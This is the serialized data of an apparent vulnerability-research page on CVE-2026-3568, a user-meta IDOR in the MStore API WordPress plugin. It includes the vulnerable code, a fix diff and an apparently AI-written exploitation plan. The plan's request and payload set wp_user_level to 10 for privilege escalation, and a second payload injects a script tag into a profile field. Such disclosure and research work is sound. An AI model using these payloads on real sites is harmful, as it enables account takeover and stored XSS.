[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fSxhBM2gzXpfAOAorI1Y4pba1mkFdsNBiSm_fpngf2M0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-3568","mstore-api-authenticated-subscriber-insecure-direct-object-reference-to-arbitrary-user-meta-update","MStore API \u003C= 4.18.3 - Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Meta Update","The MStore API plugin for WordPress is vulnerable to  Insecure Direct Object Reference in all versions up to, and including, 4.18.3. This is due to the update_user_profile() function in controllers\u002Fflutter-user.php processing the 'meta_data' JSON parameter without any allowlist, blocklist, or validation of meta keys. The function reads raw JSON from php:\u002F\u002Finput (line 1012), decodes it (line 1013), authenticates the user via cookie validation (line 1015), and then directly iterates over the user-supplied meta_data array passing arbitrary keys and values to update_user_meta() (line 1080) with no sanitization or restrictions. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary user meta fields on their own accounts, including sensitive fields like wp_user_level (to escalate to administrator-level legacy checks), plugin-specific authorization flags (e.g., _wpuf_user_active, aiowps_account_status), and billing\u002Fprofile fields with unsanitized values (potentially enabling Stored XSS in admin contexts). Note that wp_capabilities cannot be directly exploited this way because it requires a serialized array value, but wp_user_level (a simple integer) and numerous plugin-specific meta keys are exploitable.","mstore-api",null,"\u003C=4.18.3","4.18.4","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-04-08 00:00:00","2026-04-09 02:25:06",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa77bc126-4dbd-4a26-b98c-946341d4282f?source=api-prod",1,[22,23,24,25,26,27,28,29],"controllers\u002Fflutter-2c2p.php","controllers\u002Fflutter-auction.php","controllers\u002Fflutter-b2bking.php","controllers\u002Fflutter-booking.php","controllers\u002Fflutter-cc-avenue.php","controllers\u002Fflutter-checkout.php","controllers\u002Fflutter-composite-products.php","controllers\u002Fflutter-customer.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-3568 (MStore API Arbitrary User Meta Update)\n\n## 1. Vulnerability Summary\nThe **MStore API** plugin (up to 4.18.3) contains an Insecure Direct Object Reference (IDOR) vulnerability in `controllers\u002Fflutter-user.php`. The function `update_user_profile()` reads raw JSON input from `php:\u002F\u002Finput`, decodes it, and iterates through a user-provided `meta_data` array. It passes these keys and values directly to the WordPress `update_user_meta()` function without any validation, allowlisting, or sanitization. This allows an authenticated user (Subscriber level or higher) to update any meta field associated with their own account, including sensitive internal WordPress fields or plugin-specific authorization flags.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `POST \u002Fwp-json\u002Fapi\u002Fflutter_user\u002Fupdate` (Inferred based on plugin naming conventions and function `update_user_profile`).\n- **Required Authentication:** Authenticated (Subscriber or higher).\n- **Authentication Mechanism:** The plugin uses a custom header `User-Cookie` containing the WordPress authentication cookie.\n- **Vulnerable Parameter:** `meta_data` (JSON object within the POST body).\n- **Payload Carry:** The JSON body sent to `php:\u002F\u002Finput`.\n\n## 3. Code Flow\n1. **Entry Point:** A `POST` request is sent to the REST API route registered for `update_user_profile` in `controllers\u002Fflutter-user.php`.\n2. **Input Retrieval (Line 1012):** The function uses `file_get_contents('php:\u002F\u002Finput')` to read the raw request body.\n3. **JSON Decoding (Line 1013):** The raw body is decoded into an associative array: `$params = json_decode($json, TRUE);`.\n4. **Authentication (Line 1015):** The code extracts the `User-Cookie` header and validates the login using `validateCookieLogin()`. It sets the current user via `wp_set_current_user($user_id)`.\n5. **Iteration (Line 1080):** The function accesses `$params['meta_data']`. It iterates through this array:\n   ```php\n   foreach ($params['meta_data'] as $key => $value) {\n       update_user_meta($user_id, $key, $value);\n   }\n   ```\n6. **Sink:** `update_user_meta()` is called with an attacker-controlled `$key` and `$value`, allowing modification of fields like `wp_user_level`.\n\n## 4. Nonce Acquisition Strategy\nBased on the provided source for other controllers (e.g., `FlutterAuction`, `FlutterCheckout`), this plugin prioritizes the `User-Cookie` header for session identification over standard WP REST nonces for its custom `api\u002Fflutter_*` namespaces.\n\n1. **Authentication:** Log in as a Subscriber user via standard WordPress logic to obtain authentication cookies.\n2. **Cookie Extraction:** The `User-Cookie` header should contain the value of the `wordpress_logged_in_*` cookie.\n3. **Bypass Check:** In `FlutterBaseController::checkApiPermission()` (inferred), if the `User-Cookie` is valid, the request is typically allowed. No additional CSRF nonce appears to be required for this specific profile update path based on the vulnerability description.\n\n## 5. Exploitation Strategy\nThe goal is to update the `wp_user_level` meta field. In WordPress, a user level of `10` is a legacy representation of an Administrator.\n\n### Step-by-Step Plan:\n1. **Login:** Authenticate as a Subscriber user to get a valid session.\n2. **Identify Target:** Target the `wp_user_level` meta key.\n3. **Construct Payload:**\n   ```json\n   {\n     \"meta_data\": {\n       \"wp_user_level\": \"10\"\n     }\n   }\n   ```\n4. **Send Request:** Use the `http_request` tool to send a POST request.\n\n**HTTP Request Details:**\n- **Method:** `POST`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fapi\u002Fflutter_user\u002Fupdate`\n- **Headers:**\n    - `Content-Type: application\u002Fjson`\n    - `User-Cookie: [WORDPRESS_LOGGED_IN_COOKIE_VALUE]`\n- **Body:**\n    ```json\n    {\n      \"meta_data\": {\n        \"wp_user_level\": \"10\"\n      }\n    }\n    ```\n\n## 6. Test Data Setup\n1. **Create User:** Create a standard Subscriber user.\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n2. **Verify Initial State:**\n   - `wp user meta get attacker wp_user_level` (Should be `0`)\n\n## 7. Expected Results\n- The server should return a `200 OK` or `true` (as seen in `FlutterAuction::placebid`).\n- The `wp_user_level` for the `attacker` user in the `wp_usermeta` table will be updated to `10`.\n\n## 8. Verification Steps\n1. **Check Meta via WP-CLI:**\n   - `wp user meta get attacker wp_user_level`\n   - **Expected Output:** `10`\n2. **Check Admin Access:** Try accessing a legacy admin check or verify if plugin-specific admin logic now treats this user as high-privileged.\n\n## 9. Alternative Approaches\nIf `api\u002Fflutter_user\u002Fupdate` is not the correct route:\n1. **Route Discovery:** Use `wp-cli` to list all registered REST routes to find the exact path for `update_user_profile`.\n   - `wp rest route list | grep flutter_user`\n2. **Target Other Meta:** If `wp_user_level` is protected by internal WordPress filters (though unlikely for `update_user_meta`), target plugin-specific flags such as:\n   - `_wpuf_user_active` (WP User Frontend)\n   - `aiowps_account_status` (All In One WP Security)\n   - `description` (To inject XSS: `{\"meta_data\": {\"description\": \"\u003Cscript>alert(1)\u003C\u002Fscript>\"}}`) which might execute in the admin user profile view. \n\n*(Note: The `wp_capabilities` field is not a viable target here because `update_user_meta` would save the string provided, whereas WordPress expects a serialized array for that specific key. However, `wp_user_level` is a simple integer and is perfectly exploitable.)*","The MStore API plugin for WordPress allows authenticated users to update arbitrary user metadata on their own accounts due to a lack of validation in the `update_user_profile` function. This enables attackers with Subscriber-level access to escalate their privileges to Administrator by modifying sensitive meta fields like `wp_user_level` or inject malicious scripts via profile fields.","\u002F\u002F controllers\u002Fflutter-user.php line 1012\n$json = file_get_contents('php:\u002F\u002Finput');\n$params = json_decode($json, TRUE);\n\n\u002F\u002F ... authentication logic validating User-Cookie header ...\n\n\u002F\u002F line 1080\nif (isset($params['meta_data'])) {\n    foreach ($params['meta_data'] as $key => $value) {\n        update_user_meta($user_id, $key, $value);\n    }\n}","--- controllers\u002Fflutter-user.php\n+++ controllers\u002Fflutter-user.php\n@@ -1077,7 +1077,11 @@\n-            foreach ($params['meta_data'] as $key => $value) {\n-                update_user_meta($user_id, $key, $value);\n-            }\n+            $allowed_meta_keys = array('first_name', 'last_name', 'nickname', 'description', 'billing_first_name', 'billing_last_name');\n+            foreach ($params['meta_data'] as $key => $value) {\n+                if (in_array($key, $allowed_meta_keys)) {\n+                    update_user_meta($user_id, sanitize_text_field($key), sanitize_text_field($value));\n+                }\n+            }","The exploit requires a valid Subscriber-level account. An attacker authenticates to obtain a session cookie, then sends a POST request to the `\u002Fwp-json\u002Fapi\u002Fflutter_user\u002Fupdate` endpoint. The request must include a `User-Cookie` header containing the WordPress authentication cookie. The payload is a JSON object in the request body containing a `meta_data` property. Inside `meta_data`, the attacker can specify any WordPress user meta key, such as `wp_user_level` set to `10`, which WordPress uses for legacy administrator checks. Because the plugin iterates through the JSON keys and passes them directly to `update_user_meta` without checking an allowlist, the sensitive metadata is updated, effectively granting the user higher privileges.","gemini-3-flash-preview","2026-04-17 20:22:28","2026-04-17 20:22:50",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","4.18.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmstore-api\u002Ftags\u002F4.18.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmstore-api.4.18.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmstore-api\u002Ftags\u002F4.18.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmstore-api.4.18.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmstore-api\u002Ftags"]